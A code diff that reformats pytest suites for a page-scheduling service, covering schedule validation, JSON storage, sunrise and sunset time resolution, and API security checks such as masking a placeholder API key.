+        service.create_schedule(
+            ScheduleCreate(
+                page_id="page-2",
+                start_time="15:00",
+                end_time="20:00",
+                day_pattern="all",
+                enabled=False,  # Disabled - should be ignored
+            )
+        )
+
         result = service.validate_schedules()
         assert result.valid is True
         assert len(result.overlaps) == 0
-    
+
     def test_detect_gaps_full_day(self, service):
         """Test gap detection for a full day."""
         # Only schedule 9-17, leaves gaps before and after
-        service.create_schedule(ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+        )
+
         result = service.validate_schedules()
-        
+
         # Should have gaps: 00:00-09:00 and 17:00-24:00 (represented as 23:59)
         assert len(result.gaps) > 0
-    
+
     def test_detect_gaps_no_gaps(self, service):
         """Test no gaps when day is fully covered."""
-        service.create_schedule(ScheduleCreate(
-            page_id="all-day-page",
-            start_time="00:00",
-            end_time="23:45",  # Last 15-min slot
-            day_pattern="all",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="all-day-page",
+                start_time="00:00",
+                end_time="23:45",  # Last 15-min slot
+                day_pattern="all",
+                enabled=True,
+            )
+        )
+
         result = service.validate_schedules()
-        
+
         # Should have no significant gaps
         # (might have tiny gap for 23:45-24:00)
         gaps_larger_than_15min = [g for g in result.gaps if service._time_diff_minutes(g.start_time, g.end_time) > 15]
@@ -473,13 +406,15 @@ class TestValidation:
     def test_detect_gaps_entire_day_uncovered(self, service):
         """Days with zero schedules produce an all-day gap entry."""
         # Weekdays-only schedule leaves Saturday and Sunday fully uncovered
-        service.create_schedule(ScheduleCreate(
-            page_id="work-page",
-            start_time="00:00",
-            end_time="23:59",
-            day_pattern="weekdays",
-            enabled=True,
-        ))
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="work-page",
+                start_time="00:00",
+                end_time="23:59",
+                day_pattern="weekdays",
+                enabled=True,
+            )
+        )
 
         result = service.validate_schedules()
         gap_days = {day for gap in result.gaps for day in gap.days}
@@ -492,22 +427,26 @@ class TestHelpers:
 
     def test_list_schedules_wildcard_returns_all_boards(self, service):
         """list_schedules('*') returns schedules from all board_ids."""
-        s1 = service.create_schedule(ScheduleCreate(
-            board_id="board-a",
-            page_id="p1",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True,
-        ))
-        s2 = service.create_schedule(ScheduleCreate(
-            board_id="board-b",
-            page_id="p2",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True,
-        ))
+        s1 = service.create_schedule(
+            ScheduleCreate(
+                board_id="board-a",
+                page_id="p1",
+                start_time="09:00",
+                end_time="17:00",
+                day_pattern="all",
+                enabled=True,
+            )
+        )
+        s2 = service.create_schedule(
+            ScheduleCreate(
+                board_id="board-b",
+                page_id="p2",
+                start_time="09:00",
+                end_time="17:00",
+                day_pattern="all",
+                enabled=True,
+            )
+        )
         all_schedules = service.list_schedules(board_id="*")
         ids = {s.id for s in all_schedules}
         assert s1.id in ids
@@ -522,6 +461,7 @@ class TestHelpers:
     def test_get_schedule_service_singleton(self):
         """get_schedule_service() returns the same instance on repeated calls."""
         from src.schedules import service as svc_module
+
         svc_module._schedule_service = None  # Reset so we get a fresh one
         try:
             svc1 = svc_module.get_schedule_service()
@@ -533,16 +473,16 @@ class TestHelpers:
 
 class TestDefaultPage:
     """Test default page management."""
-    
+
     def test_get_default_page_initial(self, service):
         """Test getting default page when not set."""
         assert service.get_default_page() is None
-    
+
     def test_set_default_page(self, service):
         """Test setting default page."""
         service.set_default_page("page-123")
         assert service.get_default_page() == "page-123"
-    
+
     def test_clear_default_page(self, service):
         """Test clearing default page."""
         service.set_default_page("page-123")

--- a/tests/test_schedules_storage.py
+++ b/tests/test_schedules_storage.py
@@ -1,20 +1,21 @@
 """Tests for schedule storage."""
 
 import builtins
-import pytest
 import json
 import tempfile
-from pathlib import Path
 from datetime import datetime
+from pathlib import Path
 
-from src.schedules.models import ScheduleEntry, DEFAULT_BOARD_ID
+import pytest
+
+from src.schedules.models import DEFAULT_BOARD_ID, ScheduleEntry
 from src.schedules.storage import ScheduleStorage
 
 
 @pytest.fixture
 def temp_storage_file():
     """Create a temporary storage file."""
-    with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.json') as f:
+    with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".json") as f:
         temp_path = f.name
     yield temp_path
     # Cleanup
@@ -36,240 +37,212 @@ def sample_schedule():
         start_time="09:00",
         end_time="17:00",
         day_pattern="weekdays",
-        enabled=True
+        enabled=True,
     )
 
 
 class TestScheduleStorage:
     """Test schedule storage operations."""
-    
+
     def test_init_creates_empty_storage(self, temp_storage_file):
         """Test that init creates empty storage if file doesn't exist."""
         storage = ScheduleStorage(storage_file=temp_storage_file)
-        
+
         assert storage.count() == 0
         assert storage.list_all() == []
         assert storage.get_default_page_id() is None
-    
+
     def test_create_schedule(self, storage, sample_schedule):
         """Test creating a schedule entry."""
         created = storage.create(sample_schedule)
-        
+
         assert created.id == sample_schedule.id
         assert created.page_id == sample_schedule.page_id
         assert storage.count() == 1
-    
+
     def test_create_duplicate_id_raises_error(self, storage, sample_schedule):
         """Test that creating duplicate ID raises error."""
         storage.create(sample_schedule)
-        
+
         with pytest.raises(ValueError, match="already exists"):
             storage.create(sample_schedule)
-    
+
     def test_get_schedule(self, storage, sample_schedule):
         """Test retrieving a schedule by ID."""
         storage.create(sample_schedule)
-        
+
         retrieved = storage.get(sample_schedule.id)
         assert retrieved is not None
         assert retrieved.id == sample_schedule.id
         assert retrieved.page_id == sample_schedule.page_id
-    
+
     def test_get_nonexistent_schedule(self, storage):
         """Test retrieving non-existent schedule returns None."""
         result = storage.get("nonexistent-id")
         assert result is None
-    
+
     def test_list_all_schedules(self, storage):
         """Test listing all schedules."""
         # Create multiple schedules
         schedule1 = ScheduleEntry(
-            page_id="page-1",
-            start_time="09:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-1", start_time="09:00", end_time="12:00", day_pattern="all", enabled=True
         )
         schedule2 = ScheduleEntry(
-            page_id="page-2",
-            start_time="12:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-2", start_time="12:00", end_time="17:00", day_pattern="all", enabled=True
         )
-        
+
         storage.create(schedule1)
         storage.create(schedule2)
-        
+
         schedules = storage.list_all()
         assert len(schedules) == 2
         assert any(s.id == schedule1.id for s in schedules)
         assert any(s.id == schedule2.id for s in schedules)
-    
+
     def test_list_all_sorted_by_created_at(self, storage):
         """Test that list_all returns schedules sorted by created_at."""
         # Create schedules with slight time differences
         schedule1 = ScheduleEntry(
-            page_id="page-1",
-            start_time="09:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-1", start_time="09:00", end_time="12:00", day_pattern="all", enabled=True
         )
         storage.create(schedule1)
-        
+
         schedule2 = ScheduleEntry(
-            page_id="page-2",
-            start_time="12:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-2", start_time="12:00", end_time="17:00", day_pattern="all", enabled=True
         )
         storage.create(schedule2)
-        
+
         schedules = storage.list_all()
         assert schedules[0].id == schedule1.id
         assert schedules[1].id == schedule2.id
-    
+
     def test_update_schedule(self, storage, sample_schedule):
         """Test updating a schedule entry."""
         storage.create(sample_schedule)
-        
-        updates = {
-            "start_time": "10:00",
-            "end_time": "18:00",
-            "enabled": False
-        }
-        
+
+        updates = {"start_time": "10:00", "end_time": "18:00", "enabled": False}
+
         updated = storage.update(sample_schedule.id, updates)
-        
+
         assert updated is not None
         assert updated.start_time == "10:00"
         assert updated.end_time == "18:00"
         assert updated.enabled is False
         assert updated.updated_at is not None
-    
+
     def test_update_nonexistent_schedule(self, storage):
         """Test updating non-existent schedule returns None."""
         result = storage.update("nonexistent-id", {"enabled": False})
         assert result is None
-    
+
     def test_update_preserves_unchanged_fields(self, storage, sample_schedule):
         """Test that update preserves fields not in updates dict."""
         storage.create(sample_schedule)
-        
+
         updates = {"enabled": False}
         updated = storage.update(sample_schedule.id, updates)
-        
+
         assert updated.page_id == sample_schedule.page_id
         assert updated.start_time == sample_schedule.start_time
         assert updated.end_time == sample_schedule.end_time
         assert updated.enabled is False
-    
+
     def test_delete_schedule(self, storage, sample_schedule):
         """Test deleting a schedule entry."""
         storage.create(sample_schedule)
         assert storage.count() == 1
-        
+
         result = storage.delete(sample_schedule.id)
         assert result is True
         assert storage.count() == 0
-    
+
     def test_delete_nonexistent_schedule(self, storage):
         """Test deleting non-existent schedule returns False."""
         result = storage.delete("nonexistent-id")
         assert result is False
-    
+
     def test_exists(self, storage, sample_schedule):
         """Test checking if schedule exists."""
         assert storage.exists(sample_schedule.id) is False
-        
+
         storage.create(sample_schedule)
         assert storage.exists(sample_schedule.id) is True
-        
+
         storage.delete(sample_schedule.id)
         assert storage.exists(sample_schedule.id) is False
-    
+
     def test_count(self, storage):
         """Test counting schedules."""
         assert storage.count() == 0
-        
+
         schedule1 = ScheduleEntry(
-            page_id="page-1",
-            start_time="09:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-1", start_time="09:00", end_time="12:00", day_pattern="all", enabled=True
         )
         storage.create(schedule1)
         assert storage.count() == 1
-        
+
         schedule2 = ScheduleEntry(
-            page_id="page-2",
-            start_time="12:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-2", start_time="12:00", end_time="17:00", day_pattern="all", enabled=True
         )
         storage.create(schedule2)
         assert storage.count() == 2
-    
+
     def test_set_default_page_id(self, storage):
         """Test setting default page ID."""
         storage.set_default_page_id("page-default")
         assert storage.get_default_page_id() == "page-default"
-    
+
     def test_get_default_page_id_initial_none(self, storage):
         """Test that default page ID is initially None."""
         assert storage.get_default_page_id() is None
-    
+
     def test_set_default_page_id_to_none(self, storage):
         """Test clearing default page ID."""
         storage.set_default_page_id("page-default")
         assert storage.get_default_page_id() == "page-default"
-        
+
         storage.set_default_page_id(None)
         assert storage.get_default_page_id() is None
-    
+
     def test_persistence_survives_reload(self, temp_storage_file, sample_schedule):
         """Test that data persists across storage instances."""
         # Create and save schedule
         storage1 = ScheduleStorage(storage_file=temp_storage_file)
         storage1.create(sample_schedule)
         storage1.set_default_page_id("page-default")
-        
+
         # Create new storage instance (simulates restart)
         storage2 = ScheduleStorage(storage_file=temp_storage_file)
-        
+
         # Verify data persisted
         assert storage2.count() == 1
         retrieved = storage2.get(sample_schedule.id)
         assert retrieved is not None
         assert retrieved.page_id == sample_schedule.page_id
         assert storage2.get_default_page_id() == "page-default"
-    
+
     def test_handles_corrupted_json_file(self, temp_storage_file):
         """Test that storage handles corrupted JSON gracefully."""
         # Write invalid JSON to file
-        with open(temp_storage_file, 'w') as f:
+        with open(temp_storage_file, "w") as f:
             f.write("{ invalid json }")
-        
+
         # Should load with empty data instead of crashing
         storage = ScheduleStorage(storage_file=temp_storage_file)
         assert storage.count() == 0
         assert storage.get_default_page_id() is None
-    
+
     def test_datetime_serialization(self, storage, sample_schedule):
         """Test that datetime fields are properly serialized/deserialized."""
         storage.create(sample_schedule)
-        
+
         # Update to set updated_at
         storage.update(sample_schedule.id, {"enabled": False})
-        
+
         # Reload from file
         storage2 = ScheduleStorage(storage_file=storage.storage_file)
         retrieved = storage2.get(sample_schedule.id)
-        
+
         assert isinstance(retrieved.created_at, datetime)
         assert isinstance(retrieved.updated_at, datetime)
 
@@ -291,12 +264,20 @@ class TestScheduleStorage:
         """list_all('*') returns schedules from every board_id."""
         storage = ScheduleStorage(storage_file=temp_storage_file)
         s1 = ScheduleEntry(
-            board_id="board-a", page_id="p1",
-            start_time="09:00", end_time="12:00", day_pattern="all", enabled=True,
+            board_id="board-a",
+            page_id="p1",
+            start_time="09:00",
+            end_time="12:00",
+            day_pattern="all",
+            enabled=True,
         )
         s2 = ScheduleEntry(
-            board_id="board-b", page_id="p2",
-            start_time="12:00", end_time="17:00", day_pattern="all", enabled=True,
+            board_id="board-b",
+            page_id="p2",
+            start_time="12:00",
+            end_time="17:00",
+            day_pattern="all",
+            enabled=True,
         )
         storage.create(s1)
         storage.create(s2)
@@ -328,17 +309,19 @@ class TestScheduleStorage:
     def test_load_backfills_missing_board_id(self, temp_storage_file):
         """Schedules stored without board_id are assigned DEFAULT_BOARD_ID on load."""
         data = {
-            "schedules": [{
-                "id": "legacy-id",
-                "page_id": "p1",
-                "start_time": "09:00",
-                "end_time": "17:00",
-                "day_pattern": "all",
-                "enabled": True,
-                "created_at": "2024-01-01T00:00:00+00:00",
-                "updated_at": None,
-                # board_id intentionally absent
-            }],
+            "schedules": [
+                {
+                    "id": "legacy-id",
+                    "page_id": "p1",
+                    "start_time": "09:00",
+                    "end_time": "17:00",
+                    "day_pattern": "all",
+                    "enabled": True,
+                    "created_at": "2024-01-01T00:00:00+00:00",
+                    "updated_at": None,
+                    # board_id intentionally absent
+                }
+            ],
             "default_page_id": None,
             "default_page_by_board": {},
         }
@@ -381,7 +364,7 @@ class TestScheduleStorage:
 
         def failing_open(path, mode="r", **kwargs):
             if "w" in str(mode):
-                raise IOError("disk full")
+                raise OSError("disk full")
             return original_open(path, mode, **kwargs)
 
         monkeypatch.setattr(builtins, "open", failing_open)

--- a/tests/test_schedules_sun_times.py
+++ b/tests/test_schedules_sun_times.py
@@ -1,21 +1,22 @@
 """Tests for sun time calculation and sun-based schedule matching."""
 
-import pytest
 from datetime import date, time
-from unittest.mock import patch, MagicMock
+from unittest.mock import MagicMock, patch
 
+import pytest
+
+from src.schedules.models import ScheduleCreate, ScheduleEntry
+from src.schedules.service import ScheduleService
+from src.schedules.storage import ScheduleStorage
 from src.schedules.sun_times import (
     get_effective_timezone,
     get_sun_times,
-    resolve_sun_time,
     resolve_schedule_sun_times,
+    resolve_sun_time,
 )
-from src.schedules.models import ScheduleEntry, ScheduleCreate
-from src.schedules.service import ScheduleService
-from src.schedules.storage import ScheduleStorage
-
 
 # ---- Sun times computation ----
+
 
 class TestGetSunTimes:
     """Test basic sun time computation via astral."""
@@ -107,10 +108,16 @@ class TestResolveScheduleSunTimes:
     def test_fixed_times_unchanged(self):
         """Fixed-type schedule should return fallback values unchanged."""
         start, end = resolve_schedule_sun_times(
-            start_type="fixed", start_sun_offset=0, start_time_fallback="09:00",
-            end_type="fixed", end_sun_offset=0, end_time_fallback="17:00",
-            latitude=40.7128, longitude=-74.0060,
-            target_date=date(2026, 6, 21), timezone_str="America/New_York",
+            start_type="fixed",
+            start_sun_offset=0,
+            start_time_fallback="09:00",
+            end_type="fixed",
+            end_sun_offset=0,
+            end_time_fallback="17:00",
+            latitude=40.7128,
+            longitude=-74.0060,
+            target_date=date(2026, 6, 21),
+            timezone_str="America/New_York",
         )
         assert start == "09:00"
         assert end == "17:00"
@@ -118,10 +125,16 @@ class TestResolveScheduleSunTimes:
     def test_sunrise_start_resolved(self):
         """Sunrise start_type should resolve to a computed time."""
         start, end = resolve_schedule_sun_times(
-            start_type="sunrise", start_sun_offset=0, start_time_fallback="06:00",
-            end_type="fixed", end_sun_offset=0, end_time_fallback="10:00",
-            latitude=40.7128, longitude=-74.0060,
-            target_date=date(2026, 6, 21), timezone_str="America/New_York",
+            start_type="sunrise",
+            start_sun_offset=0,
+            start_time_fallback="06:00",
+            end_type="fixed",
+            end_sun_offset=0,
+            end_time_fallback="10:00",
+            latitude=40.7128,
+            longitude=-74.0060,
+            target_date=date(2026, 6, 21),
+            timezone_str="America/New_York",
         )
         # Should be a valid HH:MM string
         assert len(start) == 5 and start[2] == ":"
@@ -133,10 +146,16 @@ class TestResolveScheduleSunTimes:
     def test_sunset_end_resolved(self):
         """Sunset end_type should resolve to a computed time."""
         start, end = resolve_schedule_sun_times(
-            start_type="fixed", start_sun_offset=0, start_time_fallback="18:00",
-            end_type="sunset", end_sun_offset=30, end_time_fallback="21:00",
-            latitude=40.7128, longitude=-74.0060,
-            target_date=date(2026, 6, 21), timezone_str="America/New_York",
+            start_type="fixed",
+            start_sun_offset=0,
+            start_time_fallback="18:00",
+            end_type="sunset",
+            end_sun_offset=30,
+            end_time_fallback="21:00",
+            latitude=40.7128,
+            longitude=-74.0060,
+            target_date=date(2026, 6, 21),
+            timezone_str="America/New_York",
         )
         assert start == "18:00"  # Fixed start unchanged
         assert end is not None  # Resolved sunset + 30min
@@ -144,12 +163,16 @@ class TestResolveScheduleSunTimes:
     def test_both_sun_based(self):
         """Both start and end can be sun-based."""
         start, end = resolve_schedule_sun_times(
-            start_type="sunrise", start_sun_offset=-30,
+            start_type="sunrise",
+            start_sun_offset=-30,
             start_time_fallback="05:30",
-            end_type="sunset", end_sun_offset=30,
+            end_type="sunset",
+            end_sun_offset=30,
             end_time_fallback="20:30",
-            latitude=40.7128, longitude=-74.0060,
-            target_date=date(2026, 6, 21), timezone_str="America/New_York",
+            latitude=40.7128,
+            longitude=-74.0060,
+            target_date=date(2026, 6, 21),
+            timezone_str="America/New_York",
         )
         assert start is not None
         assert end is not None
@@ -161,10 +184,16 @@ class TestResolveScheduleSunTimes:
     def test_no_location_uses_fallback(self):
         """Without location, sun-based times should fall back to stored values."""
         start, end = resolve_schedule_sun_times(
-            start_type="sunrise", start_sun_offset=0, start_time_fallback="06:00",
-            end_type="sunset", end_sun_offset=0, end_time_fallback="20:00",
-            latitude=None, longitude=None,
-            target_date=date(2026, 6, 21), timezone_str="UTC",
+            start_type="sunrise",
+            start_sun_offset=0,
+            start_time_fallback="06:00",
+            end_type="sunset",
+            end_sun_offset=0,
+            end_time_fallback="20:00",
+            latitude=None,
+            longitude=None,
+            target_date=date(2026, 6, 21),
+            timezone_str="UTC",
         )
         assert start == "06:00"
         assert end == "20:00"
@@ -172,10 +201,16 @@ class TestResolveScheduleSunTimes:
     def test_none_end_time_preserved(self):
         """None end_time (open-ended) should be preserved for fixed types."""
         start, end = resolve_schedule_sun_times(
-            start_type="fixed", start_sun_offset=0, start_time_fallback="09:00",
-            end_type="fixed", end_sun_offset=0, end_time_fallback=None,
-            latitude=40.7128, longitude=-74.0060,
-            target_date=date(2026, 6, 21), timezone_str="America/New_York",
+            start_type="fixed",
+            start_sun_offset=0,
+            start_time_fallback="09:00",
+            end_type="fixed",
+            end_sun_offset=0,
+            end_time_fallback=None,
+            latitude=40.7128,
+            longitude=-74.0060,
+            target_date=date(2026, 6, 21),
+            timezone_str="America/New_York",
         )
         assert start == "09:00"
         assert end is None
@@ -183,14 +218,17 @@ class TestResolveScheduleSunTimes:
 
 # ---- Model tests for sun fields ----
 
+
 class TestScheduleEntrySunFields:
     """Test that ScheduleEntry properly handles sun schedule fields."""
 
     def test_default_sun_fields(self):
         """New schedule should have fixed sun fields by default."""
         entry = ScheduleEntry(
-            id="test-id", page_id="page-1",
-            start_time="09:00", end_time="17:00",
+            id="test-id",
+            page_id="page-1",
+            start_time="09:00",
+            end_time="17:00",
             day_pattern="all",
         )
         assert entry.start_type == "fixed"
@@ -201,11 +239,15 @@ class TestScheduleEntrySunFields:
     def test_sun_schedule_creation(self):
         """Schedule with sun-based start should store the fields."""
         entry = ScheduleEntry(
-            id="sun-id", page_id="page-1",
-            start_time="06:00", end_time="20:00",
+            id="sun-id",
+            page_id="page-1",
+            start_time="06:00",
+            end_time="20:00",
             day_pattern="all",
-            start_type="sunrise", start_sun_offset=-30,
-            end_type="sunset", end_sun_offset=30,
+            start_type="sunrise",
+            start_sun_offset=-30,
+            end_type="sunset",
+            end_sun_offset=30,
         )
         assert entry.start_type == "sunrise"
         assert entry.start_sun_offset == -30
@@ -215,9 +257,11 @@ class TestScheduleEntrySunFields:
     def test_schedule_create_model_sun_fields(self):
         """ScheduleCreate should accept sun fields."""
         create = ScheduleCreate(
-            page_id="page-1", start_time="06:00",
+            page_id="page-1",
+            start_time="06:00",
             day_pattern="all",
-            start_type="sunrise", start_sun_offset=15,
+            start_type="sunrise",
+            start_sun_offset=15,
         )
         assert create.start_type == "sunrise"
         assert create.start_sun_offset == 15
@@ -226,9 +270,12 @@ class TestScheduleEntrySunFields:
     def test_model_dump_includes_sun_fields(self):
         """model_dump() should include sun fields."""
         entry = ScheduleEntry(
-            id="test-id", page_id="page-1",
-            start_time="06:00", day_pattern="all",
-            start_type="sunrise", start_sun_offset=-15,
+            id="test-id",
+            page_id="page-1",
+            start_time="06:00",
+            day_pattern="all",
+            start_type="sunrise",
+            start_sun_offset=-15,
         )
         data = entry.model_dump()
         assert data["start_type"] == "sunrise"
@@ -253,6 +300,7 @@ class TestScheduleEntrySunFields:
 
 # ---- Schedule service sun resolution tests ----
 
+
 class TestScheduleServiceSunResolution:
     """Test that ScheduleService resolves sun times when checking active page."""
 
@@ -269,8 +317,11 @@ class TestScheduleServiceSunResolution:
     def test_fixed_schedule_works_as_before(self, service):
         """Fixed schedule should behave exactly as before (regression)."""
         create_data = ScheduleCreate(
-            page_id="page-1", start_time="09:00", end_time="17:00",
-            day_pattern="all", enabled=True,
+            page_id="page-1",
+            start_time="09:00",
+            end_time="17:00",
+            day_pattern="all",
+            enabled=True,
         )
         service.create_schedule(create_data)
 
@@ -296,11 +347,16 @@ class TestScheduleServiceSunResolution:
 
         # Create a sunrise-based schedule
         entry = ScheduleEntry(
-            id="sun-sched", page_id="sunrise-page",
-            start_time="06:00", end_time="08:00",
-            day_pattern="all", enabled=True,
-            start_type="sunrise", start_sun_offset=0,
-            end_type="fixed", end_sun_offset=0,
+            id="sun-sched",
+            page_id="sunrise-page",
+            start_time="06:00",
+            end_time="08:00",
+            day_pattern="all",
+            enabled=True,
+            start_type="sunrise",
+            start_sun_offset=0,
+            end_type="fixed",
+            end_sun_offset=0,
         )
         service.storage.create(entry)
 
@@ -330,10 +386,14 @@ class TestScheduleServiceSunResolution:
 
         # Create a sunrise schedule with fallback 06:00
         entry = ScheduleEntry(
-            id="fallback-sched", page_id="fallback-page",
-            start_time="06:00", end_time="08:00",
-            day_pattern="all", enabled=True,
-            start_type="sunrise", start_sun_offset=0,
+            id="fallback-sched",
+            page_id="fallback-page",
+            start_time="06:00",
+            end_time="08:00",
+            day_pattern="all",
+            enabled=True,
+            start_type="sunrise",
+            start_sun_offset=0,
         )
         service.storage.create(entry)
 
@@ -343,6 +403,7 @@ class TestScheduleServiceSunResolution:
 
 
 # ---- Storage persistence tests ----
+
 
 class TestStorageSunFields:
     """Test that sun fields persist correctly through save/load cycle."""
@@ -354,11 +415,15 @@ class TestStorageSunFields:
     def test_sun_fields_persist(self, temp_storage):
         """Sun fields should survive save and reload."""
         entry = ScheduleEntry(
-            id="persist-test", page_id="page-1",
-            start_time="06:00", end_time="20:00",
+            id="persist-test",
+            page_id="page-1",
+            start_time="06:00",
+            end_time="20:00",
             day_pattern="all",
-            start_type="sunrise", start_sun_offset=-30,
-            end_type="sunset", end_sun_offset=45,
+            start_type="sunrise",
+            start_sun_offset=-30,
+            end_type="sunset",
+            end_sun_offset=45,
         )
         temp_storage.create(entry)
 
@@ -374,15 +439,20 @@ class TestStorageSunFields:
     def test_update_sun_fields(self, temp_storage):
         """Sun fields should be updatable."""
         entry = ScheduleEntry(
-            id="update-test", page_id="page-1",
-            start_time="06:00", day_pattern="all",
+            id="update-test",
+            page_id="page-1",
+            start_time="06:00",
+            day_pattern="all",
         )
         temp_storage.create(entry)
 
-        updated = temp_storage.update("update-test", {
-            "start_type": "sunrise",
-            "start_sun_offset": 15,
-        })
+        updated = temp_storage.update(
+            "update-test",
+            {
+                "start_type": "sunrise",
+                "start_sun_offset": 15,
+            },
+        )
         assert updated is not None
         assert updated.start_type == "sunrise"
         assert updated.start_sun_offset == 15
@@ -390,18 +460,21 @@ class TestStorageSunFields:
     def test_old_schedule_data_without_sun_fields(self, tmp_path):
         """Loading data without sun fields should use defaults."""
         import json
+
         storage_file = tmp_path / "schedules.json"
         data = {
-            "schedules": [{
-                "id": "old-entry",
-                "page_id": "page-1",
-                "start_time": "09:00",
-                "end_time": "17:00",
-                "day_pattern": "all",
-                "board_id": "",
-                "enabled": True,
-                "created_at": "2025-01-01T00:00:00+00:00",
-            }],
+            "schedules": [
+                {
+                    "id": "old-entry",
+                    "page_id": "page-1",
+                    "start_time": "09:00",
+                    "end_time": "17:00",
+                    "day_pattern": "all",
+                    "board_id": "",
+                    "enabled": True,
+                    "created_at": "2025-01-01T00:00:00+00:00",
+                }
+            ],
             "default_page_id": None,
         }
         with open(storage_file, "w") as f:
@@ -417,6 +490,7 @@ class TestStorageSunFields:
 
 
 # ---- Effective timezone selection (regression for issue #814) ----
+
 
 class TestEffectiveTimezone:
     """Sun-time resolution must share the timezone used by time_service.
@@ -449,12 +523,20 @@ class TestEffectiveTimezone:
         """Sanity check that demonstrates the original bug: Lakewood, CO sunset
         on a DST day comes out 1 hour later in America/Denver than in MST."""
         denver = resolve_sun_time(
-            "sunset", 0, 39.7047, -105.0814,
-            date(2026, 5, 30), "America/Denver",
+            "sunset",
+            0,
+            39.7047,
+            -105.0814,
+            date(2026, 5, 30),
+            "America/Denver",
         )
         mst = resolve_sun_time(
-            "sunset", 0, 39.7047, -105.0814,
-            date(2026, 5, 30), "MST",
+            "sunset",
+            0,
+            39.7047,
+            -105.0814,
+            date(2026, 5, 30),
+            "MST",
         )
         assert denver is not None and mst is not None
         denver_mins = int(denver[:2]) * 60 + int(denver[3:])

--- a/tests/test_security.py
+++ b/tests/test_security.py
@@ -9,8 +9,9 @@ Covers:
 - refresh_seconds rate-limit bypass attempts
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
@@ -30,8 +31,7 @@ def client():
 @pytest.fixture
 def mock_plugin_registry_secure():
     """Mock plugin registry that returns None for unknown/traversal plugin IDs."""
-    with patch("src.api_server.get_plugin_registry") as mock_get, \
-         patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
+    with patch("src.api_server.get_plugin_registry") as mock_get, patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
         reg = Mock()
         reg.get_manifest.return_value = None
         reg.get_plugin.return_value = None
@@ -46,9 +46,11 @@ def mock_plugin_registry_secure():
 @pytest.fixture
 def mock_plugin_with_sensitive_config():
     """Mock plugin registry with a plugin that has sensitive config fields."""
-    with patch("src.api_server.get_plugin_registry") as mock_get, \
-         patch("src.api_server.get_config_manager") as mock_cm_get, \
-         patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
+    with (
+        patch("src.api_server.get_plugin_registry") as mock_get,
+        patch("src.api_server.get_config_manager") as mock_cm_get,
+        patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+    ):
         reg = Mock()
         manifest = Mock()
         manifest.name = "Test Plugin"
@@ -89,6 +91,7 @@ def mock_plugin_with_sensitive_config():
 # ===========================================================================
 # Path Traversal Tests
 # ===========================================================================
+
 
 class TestPathTraversal:
     """Tests that unusual/malicious plugin_id values are safely rejected."""
@@ -140,12 +143,13 @@ class TestPathTraversal:
         response = client.get("/plugins/nonexistent_plugin_xyz")
         body = response.text
         assert "Traceback" not in body
-        assert "File \"" not in body
+        assert 'File "' not in body
 
 
 # ===========================================================================
 # Sensitive Data Masking Tests
 # ===========================================================================
+
 
 class TestSensitiveDataMasking:
     """Tests that sensitive config fields are masked in API responses."""
@@ -160,12 +164,8 @@ class TestSensitiveDataMasking:
         assert config.get("api_key") != "super-secret-key-abc123", (
             "Raw api_key must not appear in GET /plugins/{id} response"
         )
-        assert config.get("api_key") == "***", (
-            "api_key should be masked as '***'"
-        )
-        assert config.get("location") == "New York", (
-            "Non-sensitive fields should pass through unmasked"
-        )
+        assert config.get("api_key") == "***", "api_key should be masked as '***'"
+        assert config.get("location") == "New York", "Non-sensitive fields should pass through unmasked"
 
     def test_mask_sensitive_called_on_plugin_get(self, client, mock_plugin_with_sensitive_config):
         """Verify that _mask_sensitive() is called when returning plugin config."""
@@ -177,6 +177,7 @@ class TestSensitiveDataMasking:
 # ===========================================================================
 # Input Validation Tests
 # ===========================================================================
+
 
 class TestInputValidation:
     """Tests for input validation and malformed request handling."""
@@ -232,6 +233,7 @@ class TestInputValidation:
 # Log Endpoint Safety Tests
 # ===========================================================================
 
+
 class TestLogEndpointSafety:
     """Tests that the log endpoint handles edge cases gracefully."""
 
@@ -258,9 +260,9 @@ class TestLogEndpointSafety:
 
     def test_logs_response_structure(self, client):
         """GET /logs returns the expected response shape."""
-        with patch("src.api_server._read_logs_from_files", return_value=(
-            [{"level": "INFO", "message": "test"}], 1, False
-        )):
+        with patch(
+            "src.api_server._read_logs_from_files", return_value=([{"level": "INFO", "message": "test"}], 1, False)
+        ):
             response = client.get("/logs")
         assert response.status_code == 200
         data = response.json()
@@ -275,6 +277,7 @@ class TestLogEndpointSafety:
 # ===========================================================================
 # Plugin Enable/Disable Tests (via API)
 # ===========================================================================
+
 
 class TestPluginEnableDisableAPI:
     """Tests for plugin enable/disable state transitions through the API."""
@@ -291,11 +294,13 @@ class TestPluginEnableDisableAPI:
 
     def test_enable_plugin_success_returns_correct_shape(self, client):
         """POST /plugins/{id}/enable for known plugin returns success shape."""
-        with patch("src.api_server.get_plugin_registry") as mock_reg_get, \
-             patch("src.api_server.get_config_manager") as mock_cm_get, \
-             patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with (
+            patch("src.api_server.get_plugin_registry") as mock_reg_get,
+            patch("src.api_server.get_config_manager") as mock_cm_get,
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.reset_display_service"),
+            patch("src.api_server.reset_template_engine"),
